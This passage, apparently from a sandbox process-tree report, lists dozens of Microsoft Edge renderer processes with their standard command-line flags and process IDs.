"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=107 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3584 /prefetch:1
14⤵
PID:35896

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=108 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4936 /prefetch:1
14⤵
PID:36068

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=109 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4492 /prefetch:1
14⤵
PID:36144

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=110 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6892 /prefetch:1
14⤵
PID:36780

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=102 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6156 /prefetch:1
14⤵
PID:36916

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=112 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7028 /prefetch:1
14⤵
PID:37600

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=67 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5920 /prefetch:1
14⤵
PID:37728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=114 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7096 /prefetch:1
14⤵
PID:38356

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=50 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5784 /prefetch:1
14⤵
PID:38480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=116 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7140 /prefetch:1
14⤵
PID:39268

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=117 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4432 /prefetch:1
14⤵
PID:39404

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=119 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4904 /prefetch:1
14⤵
PID:40020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=120 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6796 /prefetch:1
14⤵
PID:40032

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=122 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6740 /prefetch:1
14⤵
PID:6664

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=113 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7504 /prefetch:1
14⤵
PID:5008

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=123 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7260 /prefetch:1
14⤵
PID:2976

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4780 /prefetch:1
14⤵
PID:7140

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=56 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6472 /prefetch:1
14⤵
PID:5956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=61 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4908 /prefetch:1
14⤵
PID:3148

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=83 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5444 /prefetch:1
14⤵
PID:6424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=118 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6044 /prefetch:1
14⤵
PID:1040

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=124 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3804 /prefetch:1
14⤵
PID:7248

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6644 /prefetch:1
14⤵
PID:7552

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=84 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7656 /prefetch:1
14⤵
PID:1520

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=125 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7988 /prefetch:1
14⤵
PID:7580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=126 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7312 /prefetch:1
14⤵
PID:8904

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=64 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4860 /prefetch:1
14⤵
PID:5808

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=121 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8388 /prefetch:1
14⤵
PID:9088

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=115 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8068 /prefetch:1
14⤵
PID:9112

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=79 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:1
14⤵
PID:8152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=111 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8244 /prefetch:1
14⤵
PID:2152

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=73 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8752 /prefetch:1
14⤵
PID:9684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=70 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=8872 /prefetch:1
14⤵
PID:9720

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9072 /prefetch:1
14⤵
PID:10228

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=95 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9512 /prefetch:1
14⤵
PID:10360

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=127 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5472 /prefetch:1
14⤵
PID:1952

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=99 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5528 /prefetch:1
14⤵
PID:10212

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=128 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9172 /prefetch:1
14⤵
PID:9284

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=129 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4408 /prefetch:1
14⤵
PID:6392

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=130 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9744 /prefetch:1
14⤵
PID:11276

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=131 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5628 /prefetch:1
14⤵
PID:11260

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=132 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10152 /prefetch:1
14⤵
PID:3492

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=133 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10536 /prefetch:1
14⤵
PID:13020

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=134 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10348 /prefetch:1
14⤵
PID:13388

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=135 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10140 /prefetch:1
14⤵
PID:12684

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=136 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2008 /prefetch:1
14⤵
PID:11720

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=137 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11004 /prefetch:1
14⤵
PID:2960

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=138 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10884 /prefetch:1
14⤵
PID:11252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=139 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10124 /prefetch:1
14⤵
PID:14264

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=140 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10304 /prefetch:1
14⤵
PID:12728

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=141 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9796 /prefetch:1
14⤵
PID:17580

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=142 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9172 /prefetch:1
14⤵
PID:16956

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=143 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10560 /prefetch:1
14⤵
PID:16480

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --lang=en-US --service-sandbox-type=entity_extraction --mojo-platform-channel-handle=10708 /prefetch:8
14⤵
PID:13272

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=145 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9360 /prefetch:1
14⤵
PID:18252

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=146 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10988 /prefetch:1
14⤵
PID:18464

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=147 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10444 /prefetch:1
14⤵
PID:16788

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=148 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11368 /prefetch:1
14⤵
PID:19872

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=149 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=9404 /prefetch:1
14⤵
PID:21640

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=150 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10964 /prefetch:1
14⤵
PID:16476

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=151 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11392 /prefetch:1
14⤵
PID:22184

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=152 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3708 /prefetch:1
14⤵
PID:23100

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=153 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10812 /prefetch:1
14⤵
PID:20604

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=154 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11448 /prefetch:1
14⤵
PID:23856

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=155 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11408 /prefetch:1
14⤵
PID:21632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=156 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10780 /prefetch:1
14⤵
PID:25364

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=157 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=11664 /prefetch:1
14⤵
PID:27936

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1832,17222404174732898860,8081237564875834871,131072 --disable-gpu-compositing --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=158 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=10816 /prefetch:1
14⤵
PID:29344

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
